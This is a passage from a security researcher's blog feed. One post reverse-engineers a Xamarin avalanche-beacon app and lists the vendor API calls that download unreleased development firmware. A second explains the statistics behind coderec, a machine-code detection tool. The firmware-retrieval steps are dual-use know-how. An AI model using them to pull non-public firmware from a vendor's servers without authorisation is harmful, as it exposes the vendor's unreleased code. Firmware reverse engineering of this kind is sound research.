<span class="kd">public</span> <span class="kd">class</span> <span class="nc">SplashScreenActivity</span> <span class="kd">extends</span> <span class="nc">Activity</span> <span class="kd">implements</span> <span class="nc">IGCUserPeer</span> <span class="o">{</span>
    <span class="kd">public</span> <span class="kd">static</span> <span class="kd">final</span> <span class="nc">String</span> <span class="n">__md_methods</span> <span class="o">=</span> <span class="s">"n_onCreate:(Landroid/os/Bundle;Landroid/os/PersistableBundle;)V:GetOnCreate_Landroid_os_Bundle_Landroid_os_PersistableBundle_Handler\nn_onResume:()V:GetOnResumeHandler\n"</span><span class="o">;</span>
<span class="o">[...]</span>

    <span class="kd">private</span> <span class="kd">native</span> <span class="kt">void</span> <span class="nf">n_onCreate</span><span class="o">(</span><span class="nc">Bundle</span> <span class="n">bundle</span><span class="o">,</span> <span class="nc">PersistableBundle</span> <span class="n">persistableBundle</span><span class="o">);</span>

<span class="o">[...]</span>

    <span class="kd">static</span> <span class="o">{</span>
        <span class="nc">Runtime</span><span class="o">.</span><span class="na">register</span><span class="o">(</span><span class="s">"Pieps.App.Droid.SplashScreenActivity, PiepsApp.Droid"</span><span class="o">,</span> <span class="nc">SplashScreenActivity</span><span class="o">.</span><span class="na">class</span><span class="o">,</span> <span class="n">__md_methods</span><span class="o">);</span>
    <span class="o">}</span>

<span class="o">[...]</span>

    <span class="nd">@Override</span> <span class="c1">// android.app.Activity</span>
    <span class="kd">public</span> <span class="kt">void</span> <span class="nf">onCreate</span><span class="o">(</span><span class="nc">Bundle</span> <span class="n">bundle</span><span class="o">,</span> <span class="nc">PersistableBundle</span> <span class="n">persistableBundle</span><span class="o">)</span> <span class="o">{</span>
        <span class="n">n_onCreate</span><span class="o">(</span><span class="n">bundle</span><span class="o">,</span> <span class="n">persistableBundle</span><span class="o">);</span>
    <span class="o">}</span>

<span class="o">[...]</span>
<span class="o">}</span>
</code></pre></div></div>
<p><em>Listing: Main Activity of the Pieps Android app.</em></p>

<p>At this point I was a bit confused. Where is the application’s business logic? It took me a while to realize that the app was built using <a href="https://visualstudio.microsoft.com/xamarin/">Xamarin</a>, which is a framework for building cross-platform applications in .NET. Thus, all of the Java code that I had been looking at is just framework and glue code that exists to host a .NET runtime in the app’s process. Once you know what Xamarin apps look like, they are pretty easy to recognize due to the presence of the <code class="language-plaintext highlighter-rouge">com.xamarin.*</code> and <code class="language-plaintext highlighter-rouge">xamarin.*</code> namespaces; this was just the first time that I encountered one.</p>

<p>With that knowledge in mind, we can also briefly explain what the above code is about. As usual, the <code class="language-plaintext highlighter-rouge">onCreate</code> method is called when the app is started. It wraps the <code class="language-plaintext highlighter-rouge">n_onCreate</code> method, which is a native method of the same class. We find a hint about where to look for the implementation of the native method in the static initializer block of the class. Here, the call to <code class="language-plaintext highlighter-rouge">Runtime.register</code> in combination with the class’ <code class="language-plaintext highlighter-rouge">__md_methods</code> field connects the <code class="language-plaintext highlighter-rouge">onCreate</code> and <code class="language-plaintext highlighter-rouge">onResume</code> methods of the C# class <code class="language-plaintext highlighter-rouge">Pieps.App.Droid.SplashScreenActivity</code> in the <code class="language-plaintext highlighter-rouge">PiepsApp.Droid</code> assembly with the corresponding native methods <code class="language-plaintext highlighter-rouge">n_onCreate</code> and <code class="language-plaintext highlighter-rouge">n_onResume</code> of the <code class="language-plaintext highlighter-rouge">SplashScreenActivity</code> Java class. Here, <code class="language-plaintext highlighter-rouge">mono</code> is the name of the .NET runtime used by the Xamarin framework (at least for Android and iOS targets).</p>
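<p>The <code class="language-plaintext highlighter-rouge">__md_methods</code> string is just a newline-separated list of <code class="language-plaintext highlighter-rouge">javaName:jniSignature:connector</code> triples. As a quick illustration (my own sketch, not code from the app or from Xamarin), splitting it looks like this:</p>

```python
# Illustrative sketch (not code from the app): split a Xamarin
# __md_methods binding string into its (java_name, jni_signature,
# connector) triples. Entries are newline-separated and colon-delimited;
# JNI signatures contain no colons, so a two-split is safe.
def parse_md_methods(md_methods: str) -> list[tuple[str, str, str]]:
    bindings = []
    for entry in md_methods.strip().split("\n"):
        java_name, signature, connector = entry.split(":", 2)
        bindings.append((java_name, signature, connector))
    return bindings

# The binding string from the decompiled SplashScreenActivity above.
md = (
    "n_onCreate:(Landroid/os/Bundle;Landroid/os/PersistableBundle;)V:"
    "GetOnCreate_Landroid_os_Bundle_Landroid_os_PersistableBundle_Handler\n"
    "n_onResume:()V:GetOnResumeHandler\n"
)
```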

<p>Thus, to find the application’s business logic, one has to locate the .NET assemblies. Those are located in the <code class="language-plaintext highlighter-rouge">assemblies/</code> folder at the root of the <code class="language-plaintext highlighter-rouge">com.pieps.app.apk</code>. This folder contains two files: <code class="language-plaintext highlighter-rouge">assemblies.blob</code> and <code class="language-plaintext highlighter-rouge">assemblies.manifest</code>. The former is a custom archive format that contains the assemblies, while the latter holds some metadata about the assemblies.</p>

<p>The binary format of the <code class="language-plaintext highlighter-rouge">assemblies.blob</code> file is <a href="https://github.com/dotnet/android/blob/main/Documentation/project-docs/AssemblyStores.md#index-store">described in the documentation of .NET for Android</a>. Using this information, it is simple to create an <a href="https://github.com/vobst/pieps_firmware_tools/blob/master/dotnet_asm_store.hexpat">ImHex pattern</a> to simplify the analysis of the binary file in the <a href="https://imhex.werwolv.net/">ImHex</a> hex editor.</p>

<p><img src="/media/pieps_00/imhex.png" alt="imhex" />
<em>Image: ImHex pattern for .NET assembly stores found in Xamarin Android apps.</em></p>

<p>The assembly store contains the binary streams of all the <code class="language-plaintext highlighter-rouge">.dll</code>s that comprise the application. Note that some of them may be <a href="https://github.com/dotnet/android/pull/4686">compressed</a> and have to be decompressed to obtain the final PE file. Furthermore, the store also contains the hashes of the assembly names. The mapping between names and hashes is provided by the <code class="language-plaintext highlighter-rouge">assemblies.manifest</code> file. With those two components, we can write a small <a href="https://github.com/vobst/pieps_firmware_tools/blob/master/x_asm_store.py">script to extract all the .NET code of the application</a> <sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup>.</p>
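<p>To give an idea of what the extraction boils down to: compressed entries are (judging from the linked pull request) prefixed with a small <code class="language-plaintext highlighter-rouge">XALZ</code> header carrying a descriptor index and the uncompressed size, followed by the raw LZ4 stream. The following sketch only classifies a blob; the exact field layout is an assumption, so double-check it against the documentation:</p>

```python
import struct

# Sketch: classify a single assembly pulled out of assemblies.blob.
# Compressed entries are assumed (per the linked dotnet/android pull
# request) to carry a 12-byte header: the 4-byte magic "XALZ", a u32
# descriptor index, and the u32 uncompressed size, followed by the raw
# LZ4 stream. This layout is an assumption; verify it against the docs.
def classify_assembly(data: bytes) -> dict:
    if data[:4] == b"XALZ":
        idx, size = struct.unpack_from("<II", data, 4)
        return {
            "compressed": True,
            "descriptor_index": idx,
            "uncompressed_size": size,
            "payload": data[12:],  # decompress with an LZ4 library
        }
    # Uncompressed assemblies are plain PE files ("MZ" magic).
    return {"compressed": False, "is_pe": data[:2] == b"MZ", "payload": data}
```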

<h3 id="ios">iOS</h3>

<p>As mentioned earlier, I usually prefer reverse engineering Android apps whenever possible. Furthermore, as the app is built with a cross-platform framework we can be pretty confident that we will find the same code in the iOS app. Nevertheless, it may be interesting to have a look at how Xamarin-based apps look on iOS.</p>

<p>On iOS, simply obtaining the app package is already significantly more troublesome. Fortunately, I have a few old iPhones lying around that are vulnerable to the <a href="https://habr.com/en/companies/dsec/articles/472762/">checkm8</a> exploit. After jailbreaking one of them, e.g., using <a href="https://github.com/palera1n/palera1n/tree/main">palera1n</a>, one can create <a href="https://docs.mvt.re/en/latest/ios/filesystem/dump/">full file system dumps</a> before and after installing the app. We can diff them to find out which files are created by installing the app. Following installation, two new folders appear: <code class="language-plaintext highlighter-rouge">private/var/mobile/Containers/Data/Application/424D0CE4-7E2B-4E33-AC51-9D64D42EBEDC/</code> and <code class="language-plaintext highlighter-rouge">private/var/containers/Bundle/Application/233304E0-32B7-47E5-9AA8-3001D7BFB7E9/</code>. Note that the UUIDs will differ for each app installation. The former appears to store mutable persistent data, while the latter contains the immutable app package. In the latter folder we can find some of the <code class="language-plaintext highlighter-rouge">.dll</code> files that we already know from the Android app, along with some framework <code class="language-plaintext highlighter-rouge">.dll</code>s that seem to be iOS-specific. In contrast to the Android app, they are present as individual files without any compression. Furthermore, there is a single native Mach-O file <code class="language-plaintext highlighter-rouge">PiepsAppiOS</code>, which likely (judging by strings) contains the full Mono .NET runtime for iOS, and a <code class="language-plaintext highlighter-rouge">PiepsAppiOS.exe</code> that is probably the .NET entry point of the app.</p>
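<p>The before/after comparison of the file system dumps boils down to a set difference over relative file paths; a minimal sketch (directory names are placeholders):</p>

```python
from pathlib import Path

# Sketch: report files that exist in the post-install dump but not in
# the pre-install one. "before" and "after" are placeholder directory
# names for the two full file system dumps.
def new_files(before: str, after: str) -> set[str]:
    def relpaths(root: str) -> set[str]:
        base = Path(root)
        return {str(p.relative_to(base)) for p in base.rglob("*") if p.is_file()}
    return relpaths(after) - relpaths(before)
```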

<h3 id="net">.NET</h3>

<p>Now that we’ve reached the .NET code, we need a way to analyze it. There are two popular choices for .NET decompilers that work on Linux: <a href="https://github.com/codemerx/CodemerxDecompile">CodemerxDecompile</a> and <a href="https://github.com/icsharpcode/AvaloniaILSpy">ILSpy</a>. For some reason, ILSpy didn’t work for me. The UX of CodemerxDecompile, on the other hand, is pretty limited, especially when one is used to power tools like Ghidra. Therefore, I recommend using it solely to load all assemblies and then exporting them as a VS Code project. You can now work with this project in your favorite text editor.</p>

<p>Let’s start with an overview of the relevant assemblies and their functions.</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">PiepsApp</code>: The cross-platform part of the app. Here is the high-level implementation of all the features observable via the UI.</li>
  <li><code class="language-plaintext highlighter-rouge">PiepsApp.{Droid,iOS}</code>: The platform-specific part of the app. Things like permissions, push notifications, file access or BLE communication.</li>
  <li><code class="language-plaintext highlighter-rouge">LibFirmwareStorage</code>: The app includes some firmware files along with their metadata. This assembly provides a way of querying and getting these resources.</li>
  <li><code class="language-plaintext highlighter-rouge">LibPiepsDevice</code>: Handles interaction with the device.
    <ul>
      <li>File transfer (upload/download) via <a href="https://en.wikipedia.org/wiki/XMODEM">Xmodem</a> protocol over BLE.</li>
      <li>Commands that can be sent to the device (bootloader or main firmware). Sending, receiving, decoding, etc.</li>
      <li>An interactive shell on top of the commands.</li>
      <li>Format of firmware files.</li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">LibServicePortal</code>: Interaction with the backend API.
    <ul>
      <li>Account management (login, logout, deletion, creation, register/unregister/list devices, info, change password).</li>
      <li>Email verification.</li>
      <li>Listing of all existing devices (including some unreleased ones :) …).</li>
      <li>Query metadata about available firmwares for each existing device.</li>
      <li>Download of firmware files (including development firmwares :) …).</li>
      <li>Caching of API responses.</li>
    </ul>
  </li>
</ul>

<p>That’s a lot of interesting stuff… However, since our goal is obtaining firmware, let’s stay focused on that for now.</p>

<h2 id="firmware-download">Firmware Download</h2>

<p>First of all, the app already includes some firmwares as resources of the <code class="language-plaintext highlighter-rouge">LibFirmwareStorage</code> assembly. However, at this stage, we are no longer satisfied with some firmware files — we want ALL of them, including the ominous “development” firmwares.</p>

<p>By reading the code in <code class="language-plaintext highlighter-rouge">Pieps.ServicePortal.Services.PortalService</code>, we can get an idea of how the API works. To download all firmwares, both development and release versions, we can proceed as follows:</p>

<ol>
  <li>Log in by sending a POST request with the URL-encoded username and password to <code class="language-plaintext highlighter-rouge">/Token</code>. This returns an access token to use in subsequent requests.</li>
  <li>Get the list of all known products by sending a GET request to <code class="language-plaintext highlighter-rouge">/api/devicetype?registrationOnly=false</code>. This returns an array of products that look like this:
    <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="w">
</span><span class="p">[</span><span class="err">...</span><span class="p">]</span><span class="w">
  </span><span class="p">{</span><span class="w">
 </span><span class="nl">"DeviceTypeID"</span><span class="p">:</span><span class="w"> </span><span class="mi">110</span><span class="p">,</span><span class="w">
 </span><span class="nl">"Name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"PIEPS PRO IPS"</span><span class="p">,</span><span class="w">
 </span><span class="nl">"DeviceCategoryID"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w">
 </span><span class="nl">"FirmwareRelease"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1.2.0.0"</span><span class="p">,</span><span class="w">
 </span><span class="nl">"FirmwareUrl"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Firmware/LVS/ProIPS/info.json"</span><span class="p">,</span><span class="w">
 </span><span class="nl">"BetaRelease"</span><span class="p">:</span><span class="w"> </span><span class="s2">"LVS6SW.json"</span><span class="p">,</span><span class="w">
 </span><span class="nl">"BetaUrl"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ProIPS"</span><span class="p">,</span><span class="w">
 </span><span class="nl">"RequiredRelease"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
 </span><span class="nl">"RequiredUrl"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
 </span><span class="nl">"ProductUrl"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
 </span><span class="nl">"FAQUrl"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
 </span><span class="nl">"BD"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
 </span><span class="nl">"HasBT"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
 </span><span class="nl">"ServiceActive"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
 </span><span class="nl">"Order"</span><span class="p">:</span><span class="w"> </span><span class="mi">8</span><span class="p">,</span><span class="w">
 </span><span class="nl">"CanRegister"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
 </span><span class="nl">"UnReleased"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="w">
  </span><span class="p">},</span><span class="w">
</span><span class="p">[</span><span class="err">...</span><span class="p">]</span><span class="w">
</span><span class="p">]</span><span class="w">
</span></code></pre></div>    </div>
    <p><em>Listing: Device entry in the array returned by <code class="language-plaintext highlighter-rouge">devicetype</code> endpoint.</em></p>
  </li>
  <li>We can now retrieve information about the available development firmwares by sending a GET request to <code class="language-plaintext highlighter-rouge">/api/firmware/development/file/{BetaUrl}/{BetaRelease}</code>. This gets us an array of firmware versions like this:
    <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="w">
</span><span class="p">[</span><span class="err">...</span><span class="p">]</span><span class="w">
  </span><span class="p">{</span><span class="w">
 </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1.2.0.0"</span><span class="p">,</span><span class="w">
 </span><span class="nl">"Files"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"LVS6_V1.2.0.0.pfw"</span><span class="w"> </span><span class="p">],</span><span class="w">
 </span><span class="nl">"Description"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Public release"</span><span class="w">
  </span><span class="p">},</span><span class="w">
</span><span class="p">[</span><span class="err">...</span><span class="p">]</span><span class="w">
</span><span class="p">]</span><span class="w">
</span></code></pre></div>    </div>
    <p><em>Listing: Firmware entry in the array returned by the beta endpoint for the IPS Pro.</em></p>
  </li>
  <li>Finally, we can download the individual files via a GET request to <code class="language-plaintext highlighter-rouge">/api/firmware/development/file/{BetaUrl}/{Files[i]}</code>.</li>
</ol>

<p>Note that there are some older products for which the firmware is hosted in Azure cloud storage instead. It’s now trivial to write a <a href="https://github.com/vobst/pieps_firmware_tools/blob/master/fw_dl.py">script to download all available firmware versions</a>.</p>

<p>Now that we have downloaded the firmware, let’s dive into analyzing its structure.</p>

<h2 id="firmware-analysis">Firmware Analysis</h2>

<p>Firmwares are stored in the custom <code class="language-plaintext highlighter-rouge">.pfw</code> container format, which I guess stands for Pieps Firmware. Luckily, there is a parser for this format in <code class="language-plaintext highlighter-rouge">Pieps.PiepsDevice.File.PiepsFirmwareHeader</code>. Thus, we can write <a href="https://github.com/vobst/pieps_firmware_tools/blob/master/pieps_firmware_pfw.hexpat">another ImHex pattern</a>, this time for <code class="language-plaintext highlighter-rouge">.pfw</code> files.</p>

<p><img src="/media/pieps_00/imhexpfw.png" alt="imhexpfw" />
<em>Image: ImHex pattern for Pieps firmware (pfw) files.</em></p>

<p>There are like three and a half versions of this format. They always start with a common primary header. Our device of interest uses a format in which this header is followed by a secondary header and then a variable number of block headers. Next comes some padding, followed by the actual blocks.</p>

<p>In this case, there are two blocks. The first is a ~124KiB block of application type <code class="language-plaintext highlighter-rouge">LVS6</code>, the internal name for our device. It is followed by a ~23KiB block of application type <code class="language-plaintext highlighter-rouge">HogjiaHj131IMH</code>. The latter probably refers to a <a href="https://www.hjsip.com.cn/#/product/small-module/detail/5?locale=zhCN">tiny BLE chip</a> by HongJia.</p>
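<p>Purely for illustration, walking the block headers might look as follows. Every offset, field name, and struct layout here is hypothetical; the real format is captured in the linked ImHex pattern:</p>

```python
import struct

# Purely illustrative: iterate over fixed-size block headers following
# the secondary header of a .pfw container. Every offset, field name,
# and struct layout here is hypothetical; the real format is described
# by the linked ImHex pattern.
BLOCK_HEADER = struct.Struct("<16sII")  # app_type[16], offset, size (assumed)

def walk_blocks(buf: bytes, first_header: int, count: int):
    for i in range(count):
        app_type, offset, size = BLOCK_HEADER.unpack_from(
            buf, first_header + i * BLOCK_HEADER.size
        )
        yield app_type.rstrip(b"\x00").decode("ascii", "replace"), offset, size
```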

<p><img src="/media/pieps_00/chipble.png" alt="chipble" />
<em>Image: Size comparison between a coin and the BLE chip used by the Pieps IPS Pro.</em></p>

<p>We can thus conjecture that the container holds two separate firmware payloads: one for the main SoC and one for a dedicated BLE controller. In other words, the individual blocks of a pfw file contain independent firmwares.</p>

<p>To determine the CPU architecture, we can throw <a href="https://github.com/fkie-cad/CodeScanner">CodeScanner</a> or <a href="https://github.com/vobst/coderec">coderec</a> at the file. Judging by the results, both chips are most likely ARM-based.</p>

<p><img src="/media/pieps_00/regions_plot.png" alt="regions_plot" />
<em>Image: CodeScanner result on LVS6_V1.2.0.0.pfw.</em></p>

<p>The next step would be to extract the individual blocks and load them into your preferred decompiler, but we’ll save that for a future post.</p>

<h2 id="conclusion">Conclusion</h2>

<p>In this post, we went from knowing nothing about the device and searching for a single firmware, to obtaining all of the vendor’s development firmwares for all its devices. We also uncovered unpublished devices (and their firmwares) through the API, and discovered traces of a BLE-based shell that exposes many interesting functionalities <sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">4</a></sup>.</p>

<p>Especially the shell looks interesting, but getting this one running is something for another post.</p>

<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>This is, of course, not a priori clear, and I only found this out by first setting up a regular HTTP(S) proxy and not seeing any interesting traffic. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:2" role="doc-endnote">
      <p>It is usually a good idea to have the capture setup running before the initial connection — just not this time. <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:3" role="doc-endnote">
      <p>Yes, I realized there are already <a href="https://github.com/jakev/pyxamstore">tools</a> to do this, but I love to reinvent the wheel. <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:4" role="doc-endnote">
      <p>Why the heck is this even part of the release app? <a href="#fnref:4" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name></name></author><summary type="html"><![CDATA[In retrospect, it is often incomprehensible why one started going down a rabbit hole. No matter how I fell in, my trusty recipe for climbing back out is to write everything down in a blog post — so have fun.]]></summary></entry><entry><title type="html">coderec: Detecting Machine Code in Binary Files</title><link href="https://blog.eb9f.de/2024/11/24/coderec.html" rel="alternate" type="text/html" title="coderec: Detecting Machine Code in Binary Files" /><published>2024-11-24T00:00:00+00:00</published><updated>2024-11-24T00:00:00+00:00</updated><id>https://blog.eb9f.de/2024/11/24/coderec</id><content type="html" xml:base="https://blog.eb9f.de/2024/11/24/coderec.html"><![CDATA[<p>Firmware reverse engineering comes with some unique challenges compared to the
reversing of programs that run in the user space of some mainstream operating
system. You will encounter one of them before Ghidra’s Code Browser even opens.
Let’s illustrate it with a concrete example: I recently got myself some old Cisco
devices off eBay as I was curious to have a look at their proprietary IOS
operating system. However, when loading the IOS image into Ghidra<sup id="fnref:5" role="doc-noteref"><a href="#fn:5" class="footnote" rel="footnote">1</a></sup> you are
greeted with the following screen:</p>

<p><img src="/media/coderec/ghidra.png" alt="" /></p>

<p>Hm, what’s the processor architecture of this thing<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">2</a></sup>? In this case it’s
pretty easy to figure out the answer by googling the device or having a look at
its PCB. However, in general it is not that simple. To illustrate this, let’s
throw <code class="language-plaintext highlighter-rouge">unblob</code> at the <code class="language-plaintext highlighter-rouge">.firmware</code> section of another IOS image that I pulled
off an older device:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>% fd '.*?.bin$'
273704-297420.zip_extract/brisco_fw.uncomp.bin
297420-355662.zip_extract/et2_firmware.uncomp.bin
355664-426609.zip_extract/a.bin
426612-500306.zip_extract/hwic_fpga.bin
500308-618801.zip_extract/vws/dag/CPY-v124_22_t_throttle.V124_22_T5/vob/ios/sys/nms/pse/pse_sm_fpga.bin
618804-671957.zip_extract/vws/dag/CPY-v124_22_t_throttle.V124_22_T5/vob/ios/sys/firmware/pas/hifnhsp/obj/kontrol/flash.bin
671960-870333.zip_extract/vws/dag/CPY-v124_22_t_throttle.V124_22_T5/vob/ios/sys/firmware/pas/hifnhsp/obj/kontrol/hsp.bin
870336-925103.zip_extract/vws/dag/CPY-v124_22_t_throttle.V124_22_T5/vob/ios/sys/firmware/pas/hifnhsp/obj/kontrol/thaddeus_flash.bin
925104-1171822.zip_extract/vws/dag/CPY-v124_22_t_throttle.V124_22_T5/vob/ios/sys/firmware/pas/hifnhsp/obj/kontrol/thaddeus_hsp.bin
</code></pre></div></div>

<p>Good luck figuring out what processor to select for each of those embedded
blobs!</p>

<p>We have a great tool for that purpose, the
<a href="https://github.com/fkie-cad/Codescanner"><code class="language-plaintext highlighter-rouge">Codescanner</code></a>. It works very well.
However, I have a longstanding
<a href="https://github.com/fkie-cad/Codescanner/blob/main/C_lib/libcodescan.so">problem</a>
with it. Besides that, it’s written in C++ and Python, and I think that
everything, absolutely everything, should be written in Rust (and open source).</p>

<p>So, let’s write a tool that identifies processor instructions in binary blobs!
Or is there anything more fun to do on a sunny weekend?</p>

<p><em>Note:</em> You can find the <strong>source code on
<a href="https://github.com/vobst/coderec">GitHub</a></strong>.</p>

<h2 id="statistics-of-machine-code">Statistics of Machine Code</h2>

<p>My core idea for the implementation is based on the
<a href="https://github.com/airbus-seclab/cpu_rec"><code class="language-plaintext highlighter-rouge">cpu_rec</code></a> tool by the awesome guys
from Airbus Seclab<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">3</a></sup>.</p>

<p><code class="language-plaintext highlighter-rouge">cpu_rec</code>’s detection mechanism is built around using different n-gram
distributions (bigrams and trigrams) of the instruction bytes as a unique
“fingerprint” of the corresponding processor. It computes these distributions
for a ground truth corpus of code for about 80 different processors, and then
compares them to the distributions of an unknown sample to determine its
architecture.</p>
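<p>Computing such an n-gram fingerprint takes only a few lines; a sketch of the trigram case:</p>

```python
from collections import Counter

# Sketch: estimate the trigram distribution of a byte blob, i.e. the
# probability of observing each overlapping 3-byte sequence. This is the
# kind of "fingerprint" that gets compared against the ground-truth
# corpus.
def trigram_distribution(data: bytes) -> dict[bytes, float]:
    counts = Counter(data[i:i + 3] for i in range(len(data) - 2))
    total = sum(counts.values())
    return {gram: n / total for gram, n in counts.items()}
```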

<p>To better understand how and why this works, let’s have a look at the trigram
distributions of code for three popular embedded processors.</p>

<p><img src="/media/coderec/ARMel_tg.png" alt="" />
<img src="/media/coderec/PPCeb_tg.png" alt="" />
<img src="/media/coderec/MIPSeb_tg.png" alt="" /></p>

<p>Each data point corresponds to a trigram. The color-coding reflects the
probability of observing the trigram (from low to high: grey, orange, red, green,
blue). The exact mapping of intervals to colors does not matter here<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">4</a></sup>; what
does matter is that one can already see clear differences between the
distributions with the naked eye.</p>

<p>I could show similar plots for the bigram distribution, but we would not gain
much from that. For bigrams, there is a neat alternative way to interpret them:
as conditional probabilities \(P(B | A)\) (given that you just observed byte
\(A\), what is the probability that the next byte is \(B\)?). We obviously
lose some information through this transformation, but I still think it is a
good illustration of how much the statistics of machine code depend on the
processor.</p>
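<p>The conditional view is obtained by normalizing the bigram counts per leading byte; a small sketch:</p>

```python
from collections import Counter

# Sketch: turn bigram counts into conditional probabilities P(B | A),
# i.e. normalize over all bytes B that follow a given byte A.
def conditional_probs(data: bytes) -> dict[int, dict[int, float]]:
    following: dict[int, Counter] = {}
    for a, b in zip(data, data[1:]):
        following.setdefault(a, Counter())[b] += 1
    return {
        a: {b: n / sum(c.values()) for b, n in c.items()}
        for a, c in following.items()
    }
```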

<p><img src="/media/coderec/ARMel_cond_prob.png" alt="" />
<img src="/media/coderec/PPCeb_cond_prob.png" alt="" />
<img src="/media/coderec/MIPSeb_cond_prob.png" alt="" /></p>

<p>The plots show the conditional probabilities \( P(B | A) \)
on the vertical axis, and the projection to the 2d plane at the bottom
determines the pair (A, B). Orange points highlight cases where
\( P(B | A) = 0 \). While one can vaguely see that the clouds of blue
points have distinct features, clear differences are visible in the pattern of
orange points at the bottom.</p>

<h2 id="finding-instructions-and-more">Finding Instructions (and more)</h2>

<p>Given the main takeaway of the above section – certain byte-level probability
distributions can be used as the “fingerprint” of a processor – all that is
really left to do is to slice our target into pieces, compute the
relevant distributions for each piece, and find the architecture
with the “closest” distribution in the ground truth corpus.</p>

<p>Concerning the choice for distributions (bigrams and trigrams) and
“distance measure”<sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">5</a></sup> (
<a href="https://en.wikipedia.org/wiki/Kullback-Leibler_divergence">Kullback-Leibler</a>
divergence (KL), aka. cross-entropy) I decided to stick with <code class="language-plaintext highlighter-rouge">cpu_rec</code>’s choices
for now. However, I guess one could experiment with other distributions and
measures as well.</p>
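<p>For reference, the divergence computation itself is tiny. A sketch of \(D(q \| p)\) between a chunk distribution \(q\) and a corpus distribution \(p\), with a crude floor value standing in for proper smoothing of unseen n-grams:</p>

```python
import math

# Sketch: Kullback-Leibler divergence D(q || p) between the n-gram
# distribution q observed in a chunk and a ground-truth corpus
# distribution p. The floor value is a crude stand-in for proper
# smoothing of n-grams that never occur in the corpus.
def kl_divergence(q: dict, p: dict, floor: float = 1e-10) -> float:
    return sum(
        qx * math.log(qx / p.get(x, floor)) for x, qx in q.items() if qx > 0
    )
```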

<p>Let’s try this approach (slicing the target into chunks and then computing the
KL of each chunk against everything in the corpus) on two boot ROMs that I
dumped from the Cisco devices mentioned earlier.</p>

<p><img src="/media/coderec/bfc00000_bfc90000.dump_w4096_bg.png" alt="" />
<img src="/media/coderec/bfc00000_bfc90000.dump_w4096_tg.png" alt="" />
<img src="/media/coderec/ffc31000_ffd2b000.dump_w4096_bg.png" alt="" />
<img src="/media/coderec/ffc31000_ffd2b000.dump_w4096_tg.png" alt="" /></p>

<p>In the above plots, each colored line corresponds to a CPU architecture.
These lines “move along” the target file and their z-value is the KL of the
arch’s ground truth distribution and the distribution that was observed at the
corresponding offset in the target file. Red dots mark the best-fit (lowest)
KL for each chunk of the target file and are annotated with the name of the
corresponding architecture.</p>

<p>Just by looking at those plots we can already get a pretty good idea of what is
going on inside these ROMs. Unfortunately, if we look a bit closer, we will see
that the naive detection is still a bit noisy. Fortunately, we still have some
tricks up our sleeves that we can pull to reduce the noise level.</p>

<p>Intuitively, there is a difference between an architecture being called because
it is “clearly” the closest one for the chunk, or because it is just barely the
best fit among many lines that are around the same level.</p>

<p>What we are roughly looking for is something that captures the “statistical
significance” of the detection result. My approach for that is currently to
calculate the mean and variance of all the KLs in the range. Then, a detection
via bigrams or trigrams is immediately significant if it is more than two
standard deviations below the respective mean. If both detections are
significant but disagree, preference is given to trigrams as I found them to be
more reliable. If no detection meets the two-sigma criterion, we still make a
call if both detections are lower than the mean minus one standard deviation and
agree in their judgement. A final exception is made for the detection of ASCII
text, here, a detection via trigrams within one sigma is enough, no matter what
bigrams say.</p>

<p>With these additional heuristics in place, we get a relatively clean detection
result.</p>

<p><img src="/media/coderec/bfc00000_bfc90000.dump_w4096_regions.png" alt="" />
<img src="/media/coderec/ffc31000_ffd2b000.dump_w4096_regions.png" alt="" /></p>

<p>Those are the plots that I find the most useful in practice. There is a 1:1
correspondence between points in the plot and bytes in the file.
A point’s x-coordinate is the byte’s file offset,
the byte value is used as the y-coordinate, and coloring is used to
encode the detection result of the chunk that the byte resides in.</p>

<p>This means we can now leave this tangent that we embarked upon and finally start
analyzing this IOS image.</p>

<p><img src="/media/coderec/C800-UNI-159-3.M2_w81920_regions.png" alt="" /></p>

<hr />

<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:5" role="doc-endnote">
      <p>After removing one layer of self-extracting archive. <a href="#fnref:5" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:1" role="doc-endnote">
